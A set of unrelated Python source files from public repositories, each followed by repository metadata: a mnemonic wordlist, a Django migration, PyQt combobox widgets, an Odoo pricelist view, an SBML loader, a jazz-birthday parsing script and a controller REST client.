'shrug',
'shuffle',
'shy',
'sibling',
'sick',
'side',
'siege',
'sight',
'sign',
'silent',
'silk',
'silly',
'silver',
'similar',
'simple',
'since',
'sing',
'siren',
'sister',
'situate',
'six',
'size',
'skate',
'sketch',
'ski',
'skill',
'skin',
'skirt',
'skull',
'slab',
'slam',
'sleep',
'slender',
'slice',
'slide',
'slight',
'slim',
'slogan',
'slot',
'slow',
'slush',
'small',
'smart',
'smile',
'smoke',
'smooth',
'snack',
'snake',
'snap',
'sniff',
'snow',
'soap',
'soccer',
'social',
'sock',
'soda',
'soft',
'solar',
'soldier',
'solid',
'solution',
'solve',
'someone',
'song',
'soon',
'sorry',
'sort',
'soul',
'sound',
'soup',
'source',
'south',
'space',
'spare',
'spatial',
'spawn',
'speak',
'special',
'speed',
'spell',
'spend',
'sphere',
'spice',
'spider',
'spike',
'spin',
'spirit',
'split',
'spoil',
'sponsor',
'spoon',
'sport',
'spot',
'spray',
'spread',
'spring',
'spy',
'square',
'squeeze',
'squirrel',
'stable',
'stadium',
'staff',
'stage',
'stairs',
'stamp',
'stand',
'start',
'state',
'stay',
'steak',
'steel',
'stem',
'step',
'stereo',
'stick',
'still',
'sting',
'stock',
'stomach',
'stone',
'stool',
'story',
'stove',
'strategy',
'street',
'strike',
'strong',
'struggle',
'student',
'stuff',
'stumble',
'style',
'subject',
'submit',
'subway',
'success',
'such',
'sudden',
'suffer',
'sugar',
'suggest',
'suit',
'summer',
'sun',
'sunny',
'sunset',
'super',
'supply',
'supreme',
'sure',
'surface',
'surge',
'surprise',
'surround',
'survey',
'suspect',
'sustain',
'swallow',
'swamp',
'swap',
'swarm',
'swear',
'sweet',
'swift',
'swim',
'swing',
'switch',
'sword',
'symbol',
'symptom',
'syrup',
'system',
'table',
'tackle',
'tag',
'tail',
'talent',
'talk',
'tank',
'tape',
'target',
'task',
'taste',
'tattoo',
'taxi',
'teach',
'team',
'tell',
'ten',
'tenant',
'tennis',
'tent',
'term',
'test',
'text',
'thank',
'that',
'theme',
'then',
'theory',
'there',
'they',
'thing',
'this',
'thought',
'three',
'thrive',
'throw',
'thumb',
'thunder',
'ticket',
'tide',
'tiger',
'tilt',
'timber',
'time',
'tiny',
'tip',
'tired',
'tissue',
'title',
'toast',
'tobacco',
'today',
'toddler',
'toe',
'together',
'toilet',
'token',
'tomato',
'tomorrow',
'tone',
'tongue',
'tonight',
'tool',
'tooth',
'top',
'topic',
'topple',
'torch',
'tornado',
'tortoise',
'toss',
'total',
'tourist',
'toward',
'tower',
'town',
'toy',
'track',
'trade',
'traffic',
'tragic',
'train',
'transfer',
'trap',
'trash',
'travel',
'tray',
'treat',
'tree',
'trend',
'trial',
'tribe',
'trick',
'trigger',
'trim',
'trip',
'trophy',
'trouble',
'truck',
'true',
'truly',
'trumpet',
'trust',
'truth',
'try',
'tube',
'tuition',
'tumble',
'tuna',
'tunnel',
'turkey',
'turn',
'turtle',
'twelve',
'twenty',
'twice',
'twin',
'twist',
'two',
'type',
'typical',
'ugly',
'umbrella',
'unable',
'unaware',
'uncle',
'uncover',
'under',
'undo',
'unfair',
'unfold',
'unhappy',
'uniform',
'unique',
'unit',
'universe',
'unknown',
'unlock',
'until',
'unusual',
'unveil',
'update',
'upgrade',
'uphold',
'upon',
'upper',
'upset',
'urban',
'urge',
'usage',
'use',
'used',
'useful',
'useless',
'usual',
'utility',
'vacant',
'vacuum',
'vague',
'valid',
'valley',
'valve',
'van',
'vanish',
'vapor',
'various',
'vast',
'vault',
'vehicle',
'velvet',
'vendor',
'venture',
'venue',
'verb',
'verify',
'version',
'very',
'vessel',
'veteran',
'viable',
'vibrant',
'vicious',
'victory',
'video',
'view',
'village',
'vintage',
'violin',
'virtual',
'virus',
'visa',
'visit',
'visual',
'vital',
'vivid',
'vocal',
'voice',
'void',
'volcano',
'volume',
'vote',
'voyage',
'wage',
'wagon',
'wait',
'walk',
'wall',
'walnut',
'want',
'warfare',
'warm',
'warrior',
'wash',
'wasp',
'waste',
'water',
'wave',
'way',
'wealth',
'weapon',
'wear',
'weasel',
'weather',
'web',
'wedding',
'weekend',
'weird',
'welcome',
'west',
'wet',
'whale',
'what',
'wheat',
'wheel',
'when',
'where',
'whip',
'whisper',
'wide',
'width',
'wife',
'wild',
'will',
'win',
'window',
'wine',
'wing',
'wink',
'winner',
'winter',
'wire',
'wisdom',
'wise',
'wish',
'witness',
'wolf',
'woman',
'wonder',
'wood',
'wool',
'word',
'work',
'world',
'worry',
'worth',
'wrap',
'wreck',
'wrestle',
'wrist',
'write',
'wrong',
'yard',
'year',
'yellow',
'you',
'young',
'youth',
'zebra',
'zero',
'zone',
'zoo'
]
| lbryio/lbry | torba/torba/client/words/english.py | Python | mit | 19,271 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'OrderSet'
db.create_table(u'costs_orderset', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['myuser.MyUser'], null=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=250)),
))
db.send_create_signal(u'costs', ['OrderSet'])
# Adding M2M table for field RVUs on 'OrderSet'
m2m_table_name = db.shorten_name(u'costs_orderset_RVUs')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('orderset', models.ForeignKey(orm[u'costs.orderset'], null=False)),
('rvu', models.ForeignKey(orm[u'costs.rvu'], null=False))
))
db.create_unique(m2m_table_name, ['orderset_id', 'rvu_id'])
def backwards(self, orm):
# Deleting model 'OrderSet'
db.delete_table(u'costs_orderset')
# Removing M2M table for field RVUs on 'OrderSet'
db.delete_table(db.shorten_name(u'costs_orderset_RVUs'))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'costs.gpci': {
'Meta': {'unique_together': "(('year', 'location'),)", 'object_name': 'GPCI'},
'facility': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'malpractice': ('django.db.models.fields.FloatField', [], {}),
'work': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
},
u'costs.medicarefactor': {
'Meta': {'object_name': 'MedicareFactor'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {'unique': 'True'})
},
u'costs.orderset': {
'Meta': {'object_name': 'OrderSet'},
'RVUs': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['costs.RVU']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['myuser.MyUser']", 'null': 'True', 'blank': 'True'})
},
u'costs.rvu': {
'Meta': {'unique_together': "(('year', 'code', 'mod'),)", 'object_name': 'RVU'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'description': ('django.db.models.fields.TextField', [], {}),
'facility': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'malpractice': ('django.db.models.fields.FloatField', [], {}),
'mod': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'work': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
},
u'myuser.myuser': {
'Meta': {'ordering': "('last_name',)", 'object_name': 'MyUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254', 'db_index': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"})
}
}
complete_apps = ['costs'] | shapiromatron/comp523-medcosts | costs/migrations/0003_auto__add_orderset.py | Python | mit | 6,803 |
# -*- coding: utf-8 -*-
#
# Copyright © 2009-2010 Pierre Raybaut
# Licensed under the terms of the MIT License
# (see spyderlib/__init__.py for details)
"""Customized combobox widgets"""
# pylint: disable=C0103
# pylint: disable=R0903
# pylint: disable=R0911
# pylint: disable=R0201
from PyQt4.QtGui import (QComboBox, QFont, QToolTip, QSizePolicy,
QCompleter)
from PyQt4.QtCore import SIGNAL, Qt, QUrl, QTimer
import os.path as osp
# Local imports
from SMlib.configs.baseconfig import _
class BaseComboBox(QComboBox):
"""Editable combo box base class"""
def __init__(self, parent):
QComboBox.__init__(self, parent)
self.setEditable(True)
self.setCompleter(QCompleter(self))
# --- overrides
def keyPressEvent(self, event):
"""Handle key press events"""
if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:
if self.add_current_text_if_valid():
self.selected()
else:
QComboBox.keyPressEvent(self, event)
def focusOutEvent(self, event):
"""Handle focus out event"""
# Calling asynchronously the 'add_current_text' to avoid crash
# https://groups.google.com/group/spyderlib/browse_thread/thread/2257abf530e210bd
QTimer.singleShot(50, self.add_current_text_if_valid)
QComboBox.focusOutEvent(self, event)
# --- own methods
def is_valid(self, qstr):
"""
Return True if string is valid
Return None if validation can't be done
"""
pass
def selected(self):
"""Action to be executed when a valid item has been selected"""
self.emit(SIGNAL('valid(bool)'), True)
def add_text(self, text):
"""Add text to combo box: add a new item if text is not found in
combo box items"""
index = self.findText(text)
while index != -1:
self.removeItem(index)
index = self.findText(text)
self.insertItem(0, text)
index = self.findText('')
if index != -1:
self.removeItem(index)
self.insertItem(0, '')
if text != '':
self.setCurrentIndex(1)
else:
self.setCurrentIndex(0)
else:
self.setCurrentIndex(0)
def add_current_text(self):
"""Add current text to combo box history (convenient method)"""
self.add_text(self.currentText())
def add_current_text_if_valid(self):
"""Add current text to combo box history if valid"""
valid = self.is_valid(self.currentText())
if valid or valid is None:
self.add_current_text()
return True
class PatternComboBox(BaseComboBox):
"""Search pattern combo box"""
def __init__(self, parent, items=None, tip=None,
adjust_to_minimum=True):
BaseComboBox.__init__(self, parent)
if adjust_to_minimum:
self.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLength)
self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
if items is not None:
self.addItems(items)
if tip is not None:
self.setToolTip(tip)
class EditableComboBox(BaseComboBox):
"""
Editable combo box + Validate
"""
def __init__(self, parent):
BaseComboBox.__init__(self, parent)
self.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLength)
self.font = QFont()
self.connect(self, SIGNAL("editTextChanged(QString)"), self.validate)
self.connect(self, SIGNAL("activated(QString)"),
lambda qstr: self.validate(qstr, editing=False))
self.set_default_style()
self.tips = {True: _("Press enter to validate this entry"),
False: _('This entry is incorrect')}
def show_tip(self, tip=""):
"""Show tip"""
QToolTip.showText(self.mapToGlobal(self.pos()), tip, self)
def set_default_style(self):
"""Set widget style to default"""
self.font.setBold(False)
self.setFont(self.font)
self.setStyleSheet("")
self.show_tip()
def selected(self):
"""Action to be executed when a valid item has been selected"""
BaseComboBox.selected(self)
self.set_default_style()
def validate(self, qstr, editing=True):
"""Validate entered path"""
valid = self.is_valid(qstr)
if self.hasFocus() and valid is not None:
self.font.setBold(True)
self.setFont(self.font)
if valid:
self.setStyleSheet("color:rgb(50, 155, 50);")
else:
self.setStyleSheet("color:rgb(200, 50, 50);")
if editing:
# Combo box text is being modified: invalidate the entry
self.show_tip(self.tips[valid])
self.emit(SIGNAL('valid(bool)'), False)
else:
# A new item has just been selected
if valid:
self.selected()
else:
self.emit(SIGNAL('valid(bool)'), False)
else:
self.set_default_style()
class PathComboBox(EditableComboBox):
"""
QComboBox handling path locations
"""
def __init__(self, parent, adjust_to_contents=False):
EditableComboBox.__init__(self, parent)
if adjust_to_contents:
self.setSizeAdjustPolicy(QComboBox.AdjustToContents)
else:
self.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLength)
self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
self.tips = {True: _("Press enter to validate this path"),
False: _('This path is incorrect.\n'
'Enter a correct directory path,\n'
'then press enter to validate')}
def is_valid(self, qstr=None):
"""Return True if string is valid"""
if qstr is None:
qstr = self.currentText()
return osp.isdir( unicode(qstr) )
def selected(self):
"""Action to be executed when a valid item has been selected"""
EditableComboBox.selected(self)
self.emit(SIGNAL("open_dir(QString)"), self.currentText())
class UrlComboBox(PathComboBox):
"""
QComboBox handling urls
"""
def __init__(self, parent, adjust_to_contents=False):
PathComboBox.__init__(self, parent, adjust_to_contents)
self.disconnect(self, SIGNAL("editTextChanged(QString)"), self.validate)
def is_valid(self, qstr=None):
"""Return True if string is valid"""
if qstr is None:
qstr = self.currentText()
return QUrl(qstr).isValid()
def is_module_or_package(path):
"""Return True if path is a Python module/package"""
is_module = osp.isfile(path) and osp.splitext(path)[1] in ('.py', '.pyw')
is_package = osp.isdir(path) and osp.isfile(osp.join(path, '__init__.py'))
return is_module or is_package
class PythonModulesComboBox(PathComboBox):
"""
QComboBox handling Python modules or packages path
(i.e. .py, .pyw files *and* directories containing __init__.py)
"""
def __init__(self, parent, adjust_to_contents=False):
PathComboBox.__init__(self, parent, adjust_to_contents)
def is_valid(self, qstr=None):
"""Return True if string is valid"""
if qstr is None:
qstr = self.currentText()
return is_module_or_package(unicode(qstr))
def selected(self):
"""Action to be executed when a valid item has been selected"""
EditableComboBox.selected(self)
self.emit(SIGNAL("open(QString)"), self.currentText())
| koll00/Gui_SM | SMlib/widgets/comboboxes.py | Python | mit | 8,133 |
# -*- coding: utf-8 -*-
"""
Created on 05 Apr 2014 3:30 AM
@author: <'Ronny Eichler'> ronny.eichler@gmail.com
UI
""" | wonkoderverstaendige/PyFL593FL | PyFL593FL/ui/__init__.py | Python | mit | 117 |
# -*- coding: utf-8 -*-
from openerp import tools
from openerp import models,fields,api
from openerp.tools.translate import _
class is_pricelist_item(models.Model):
_name='is.pricelist.item'
_order='pricelist_name,price_version_id,sequence,product_id'
_auto = False
pricelist_name = fields.Char('Liste de prix')
pricelist_type = fields.Char('Type')
base = fields.Integer('Base')
price_version_id = fields.Many2one('product.pricelist.version', 'Version')
version_date_start = fields.Date('Date début version')
version_date_end = fields.Date('Date fin version')
product_id = fields.Many2one('product.product', 'Article')
gestionnaire_id = fields.Many2one('is.gestionnaire', 'Gestionnaire')
ref_client = fields.Char('Référence client')
ref_fournisseur = fields.Char('Référence fournisseur')
moule = fields.Char('Moule ou Dossier F')
sequence = fields.Integer('Sequence')
product_uom_id = fields.Many2one('product.uom', "Unité")
product_po_uom_id = fields.Many2one('product.uom', "Unité d'achat")
min_quantity = fields.Float('Quantité min.')
price_surcharge = fields.Float('Prix')
item_date_start = fields.Date('Date début ligne')
item_date_end = fields.Date('Date fin ligne')
def init(self, cr):
tools.drop_view_if_exists(cr, 'is_pricelist_item')
cr.execute("""
CREATE OR REPLACE view is_pricelist_item AS (
SELECT
ppi.id as id,
pl.name as pricelist_name,
pl.type as pricelist_type,
ppi.base as base,
ppi.price_version_id as price_version_id,
ppv.date_start as version_date_start,
ppv.date_end as version_date_end,
ppi.product_id as product_id,
pt.is_gestionnaire_id as gestionnaire_id,
pt.is_ref_client as ref_client,
pt.is_ref_fournisseur as ref_fournisseur,
pt.is_mold_dossierf as moule,
ppi.sequence as sequence,
pt.uom_id as product_uom_id,
pt.uom_po_id as product_po_uom_id,
ppi.min_quantity as min_quantity,
ppi.price_surcharge as price_surcharge,
ppi.date_start as item_date_start,
ppi.date_end as item_date_end
FROM product_pricelist_item ppi inner join product_product pp on ppi.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
inner join product_pricelist_version ppv on ppi.price_version_id=ppv.id
inner join product_pricelist pl on ppv.pricelist_id = pl.id
WHERE ppi.id>0
)
""")
@api.multi
def action_liste_items(self):
for obj in self:
print obj.price_version_id.pricelist_id
if obj.price_version_id.pricelist_id.type=='sale':
view_id=self.env.ref('is_plastigray.is_product_pricelist_item_sale_tree_view').id
pricelist_type='sale'
else:
view_id=self.env.ref('is_plastigray.is_product_pricelist_item_purchase_tree_view').id
pricelist_type='purchase'
return {
'name': str(obj.pricelist_name)+" ("+str(obj.price_version_id.name)+")",
'view_mode': 'tree',
'view_type': 'form',
'res_model': 'product.pricelist.item',
'type': 'ir.actions.act_window',
#'view_id': view_id.id,
'view_id' : False,
'views' : [(view_id, 'tree')],
'domain': [('price_version_id','=',obj.price_version_id.id)],
'context': {
'default_price_version_id': obj.price_version_id.id,
'type': pricelist_type,
}
}
# return {
# 'name': u'Lignes des factures client actualisées à '+str(now),
# 'view_mode': 'tree,form,graph',
# 'view_type': 'form',
# 'view_id' : False,
# 'views' : [(view_id, 'tree'),(False, 'form'),(False, 'graph')],
# 'res_model': 'is.account.invoice.line',
# 'domain' : [('type','=', 'out_invoice')],
# 'type': 'ir.actions.act_window',
# }
@api.multi
def corriger_anomalie_pricelist(self):
for obj in self:
base=False
if obj.pricelist_type=='purchase' and obj.base!=2:
base=2
if obj.pricelist_type=='sale' and obj.base!=1:
base=1
if base:
items=self.env['product.pricelist.item'].browse(obj.id)
for item in items:
item.base=base
| tonygalmiche/is_plastigray | report/is_pricelist_item.py | Python | mit | 5,365 |
import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'MODEL0912503622.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString) | biomodels/MODEL0912503622 | MODEL0912503622/model.py | Python | cc0-1.0 | 427 |
# -*- coding:utf-8 -*-
import xml.etree.ElementTree as etree
import re
import datetime
#set the output file name for the 'good' data
#needs to be to a structured format - but dump to text for now
#clean_output = 'clean_out.csv'
clean_output = 'clean.txt'
#set the dirty output file where we'll dump the awkward lines
dirty_output = 'dirty_out.txt'
#open the clean output file
f2 = open(clean_output, 'w')
#open the clean output file
f3 = open(dirty_output, 'w')
#probably a better way of doing this - but set up a list of valide months to compare against (maybe move nearer to this code?)
month_list = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August','September', 'October', 'November', 'December']
ref = ("january", "february", "march", "april", "may", "june", "july", "august", "september", "october", "november", "december")
#initialise integer values for month and day
birth_day = 0
birth_month = 0
# First function: cleans out (invisible) ascii chars 132 and 160 from some lines which was causing problems
def remove_non_ascii_1(text):
return ''.join(i for i in text if ord(i)<128) #we need no characters below this normal pronting range
#Second Function - test_line() - split the line into words and return how many there are
# (just used to spot 2-word lines which indicate a day / month line)
def test_line (text):
words = text.split()
num_words = len(words)
#print "one " + str( words[0])
#print "two " + str( words[1])
return num_words
def muso_detail_split(text):
# initialise so we can use it as a flag if fails below
#worked = True
#split the line of text using commas as a delimiter
muso_bits = text.split(',')
try: #try to convert the contents of the last item - to an integer. If it is 1928 or 1957 for example, it should work
birth_year = int(muso_bits [-1])
#Grab everything before the first comma - that seems to be a constant for the name location
muso_name = muso_bits[0]
#split that name into first, middle and surname to be returned individually - using the space as a delimiter
# putting each into a list
muso_name_list = muso_name.split(" ")
muso_forname = muso_name_list[0] #choose the first item in the list - should be the forname
muso_surname = muso_name_list[-1] # choose the last item as the last name
#if there are more than 2 items in the list, assume that the second is a middle name
if len (muso_name_list) > 2:
muso_midname = muso_name_list[1]
else:
muso_midname = ""
#chuck away the first item as we dealt with that as the names at lines 12 - 20 above
#print muso_forname
#print muso_surname
muso_bits.remove(muso_bits[0])
#chuck away the last item - it was the year of birth (line 24)
muso_bits.remove(muso_bits[-1])
#we should be left with the instruments
instrm_list = list(muso_bits)
#that's it all sorted - keep these remaining items as a list of instruments / roles which we'll return as a list
############
# Needs to find and replace / in instrument list (e.g Campise entry)
muso_obj = [muso_forname, muso_midname, muso_surname, birth_year, instrm_list]
except ValueError:
# doesn't end with a single year we can't process it for now = write it out to the dirty file (and mark *** for future reference)
f3.write(str(birth_day) + " " + str(birth_month) +"\n")
f3.write(text + "*** " +"\n")
# return empty list
muso_obj = []
return muso_obj
def create_date(d,m,y):
date1 = datetime.date(y,m,d)
return date1
def date_comp(dc):
for month in ref:
if dc in month:
return ref.index(month) + 1
def find_death(line):
line = line.strip()
list1 = line.split(',')
try:
int_year = int(list1[1])
#print(int_year)
except:
pass
#print list[0]
list1[0] = list1[0].replace(".", " ")
#print list[0]
d_m = list1[0].split(" ")
d_m[0] = d_m[0].replace(".","").lower()
int_month = date_comp(d_m[0])
int_day = d_m[-1]
return str(int_year) + "-" + str(int_month) + "-" + str(int_day)
##################################
# main code starts here #
##################################
# grab the document as an xml object
tree = etree.parse('jazz_birthdays_manual_tidy.xml')
root = tree.getroot()
for child in root:
ignore_flag = False #used to identify elements with sub-elements <ulink> (ie Youtube links) as we don't want those
dod =""
for sub_child in child:
if sub_child is not None:
# if there is a sub-elemnent (which can only be ulink)
# set the flag to true and do nothing more with that line
ignore_flag = True
if not ignore_flag: #so no sub elements - so we need to to more checks
if child.text is not None: #not an empty <para/>
line_text = child.text.encode('utf-8') #encode the text
line_text = line_text.strip() # strip leading and trailing whitespace
line_text = remove_non_ascii_1(line_text) # call the function to clean out ascii chars 132 and 160 from some lines
nw = test_line (line_text)
if nw ==2:
#it can only be a date (as only they have two elements - day / month)
words = line_text.split()
tally = 0
if words[1] in month_list:
#take it that this is a date
# update the global vaiables with day and month * ordinal values*
# We can use these to build up a datetime object for each musician's birth
# (taking the year from the muso's line below
birth_day = int(words [0])
birth_month = month_list.index(words[1]) +1
else:
#take it that it is a musician line (as we've excluded the day / month lines )
find_substr = "(or"
if find_substr in line_text:
f3.write(str(birth_day) + " " + str(birth_month) +"\n")
f3.write(line_text +"\n")
else:
# we need to find death dates and split on those
# treating the second part as the death date
# and the first part as a general musician entry
death_text =""
deceased = re.search ("\(d\.(.*)\)", line_text)
# if "(d." found use that to split the string
if deceased:
split_dec = re.split ("\(d\.(.*)\)", line_text)
line_text = split_dec [0]
death_text = split_dec[1]
muso_parts = muso_detail_split (line_text)
# returned as muso_forname, muso_midname, muso_surname, birth_year, instrm_list
#print len (muso_parts)
if len (muso_parts) > 0:
#for part in muso_parts:
# print part
#print len(muso_parts)
#print muso_parts[3]
dob = create_date (birth_day, birth_month, muso_parts[3])
#dod = create_death_date (death_text)
if deceased:
print death_text
dod = find_death (death_text)
f2.write (muso_parts[2] + "\t" + muso_parts[0] +"\t" + muso_parts [1] +"\t" + str(dob) + "\t")
for inst in muso_parts [4]:
f2.write (inst + ", ")
#f deceased:
# f2.write ("Deceased \t")
if dod != "":
f2.write(dod)
f2.write("\n")
#f2.write("\n")
#print muso_parts
#for part in muso_parts:
# print part
#f3.write(line_text +"\n")
#print len(child)
# f.close()
f2.close()
f3.close() | watty62/jazz_birthdays | old versions/extraction4.py | Python | cc0-1.0 | 7,375 |
#
# Copyright (c) 2010,2011,2012,2013 Big Switch Networks, Inc.
#
# Licensed under the Eclipse Public License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
#
# module: storeclient.py
#
# This module manages communication with the console, i.e. the REST interface
# of a Big Switch Controller node.
import urllib
import urllib2
import ftplib
import json
import datetime
import time
import traceback
import url_cache
class StringReader():
# used for ftp, as a replacement for read from an existing file
def __init__(self, value):
"""
Value can be a string, or a generator.
"""
self.value = value
self.offset = 0
if type(value) == str or type(value) == unicode:
self.len = len(value)
else:
self.last = None
def read(self, size = None):
if size:
if size > self.len - self.offset:
size = self.len - self.offset
result = self.value[self.offset:size]
self.offset += size
return result
# supporing generators.
if self.last: # use remainder
if size > self.len - self.offset:
size = self.len - self.offset
result = self.last[self.offset:size]
self.offset += size
if self.offset == self.len:
self.last = None
return result
item = value.next()
len_item = len(item)
if len_item <= size:
return item
# set up remainder
result = item[:size]
self.last = item[size:]
self.offset = 0
self.len = len(self.last)
return result
class StoreClient():
controller = None
display_rest = False
display_rest_reply = False
table_read_url = "http://%s/rest/v1/model/%s/"
entry_post_url = "http://%s/rest/v1/model/%s/"
user_data_url = "http://%s/rest/v1/data/"
sdn_platform_data_url = "http://%s/rest/v1/system/"
def set_controller(self,controller):
self.controller = controller
def display_mode(self, mode):
self.display_rest = mode
def display_reply_mode(self, mode):
self.display_rest_reply = mode
def set_sdn_controller_platform_rest_if(self, sdn_controller_rest_if):
url = self.sdn_platform_data_url % (self.controller)
url = url + "restifaddr/"
data = self.rest_post_request(url, sdn_controller_rest_if)
def rest_simple_request(self,url, use_cache = None, timeout = None):
# include a trivial retry mechanism ... other specific
# urllib2 exception types may need to be included
retry_count = 0
if use_cache == None or use_cache:
result = url_cache.get_cached_url(url)
if result != None:
return result
while retry_count > 0:
try:
return urllib2.urlopen(url, timeout = timeout).read()
except urllib2.URLError:
retry_count -= 1
time.sleep(1)
# try again without the try...
if self.display_rest:
print "REST-SIMPLE:", 'GET', url
result = urllib2.urlopen(url, timeout = timeout).read()
if self.display_rest_reply:
print 'REST-SIMPLE: %s reply "%s"' % (url, result)
url_cache.save_url(url, result)
return result
def rest_json_request(self, url):
entries = url_cache.get_cached_url(url)
if entries != None:
return entries
result = self.rest_simple_request(url)
# XXX check result
entries = json.loads(result)
url_cache.save_url(url, entries)
return entries
def rest_post_request(self, url, obj, verb='PUT'):
post_data = json.dumps(obj)
if self.display_rest:
print "REST-POST:", verb, url, post_data
request = urllib2.Request(url, post_data, {'Content-Type':'application/json'})
request.get_method = lambda: verb
response = urllib2.urlopen(request)
result = response.read()
if self.display_rest_reply:
print 'REST-POST: %s reply: "%s"' % (url, result)
return result
def get_table_from_store(self, table_name, key=None, val=None, match=None):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, table_name)
if not match:
match = "startswith"
if key and val:
url = "%s?%s__%s=%s" % (url, key, match, urllib.quote_plus(val))
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request(url)
entries = json.loads(data)
url_cache.save_url(url, entries)
return entries
def get_object_from_store(self, table_name, pk_value):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, table_name)
url += (pk_value + '/')
result = url_cache.get_cached_url(url)
if result != None:
return result
if self.display_rest:
print "REST-MODEL:", url
response = urllib2.urlopen(url)
if response.code != 200:
# LOOK! Should probably raise exception here instead.
# In general we need to rethink the store interface and how
# we should use exceptions.
return None
data = response.read()
result = json.loads(data)
if self.display_rest_reply:
print 'REST-MODEL: %s reply: "%s"' % (url, result)
url_cache.save_url(url, result)
return result
# obj_data must contain a key/val and any other required data
def rest_create_object(self, obj_type, obj_data):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url_cache.clear_cached_urls()
url = self.entry_post_url % (self.controller, obj_type)
data = self.rest_post_request(url, obj_data)
# LOOK! successful stuff should be returned in json too.
if data != "saved":
result = json.loads(data)
return result
url_cache.clear_cached_urls()
def find_object_from_store(self, obj_type, key, val):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request("%s?%s__exact=%s" % (url, key, urllib.quote_plus(val)))
entries = json.loads(data)
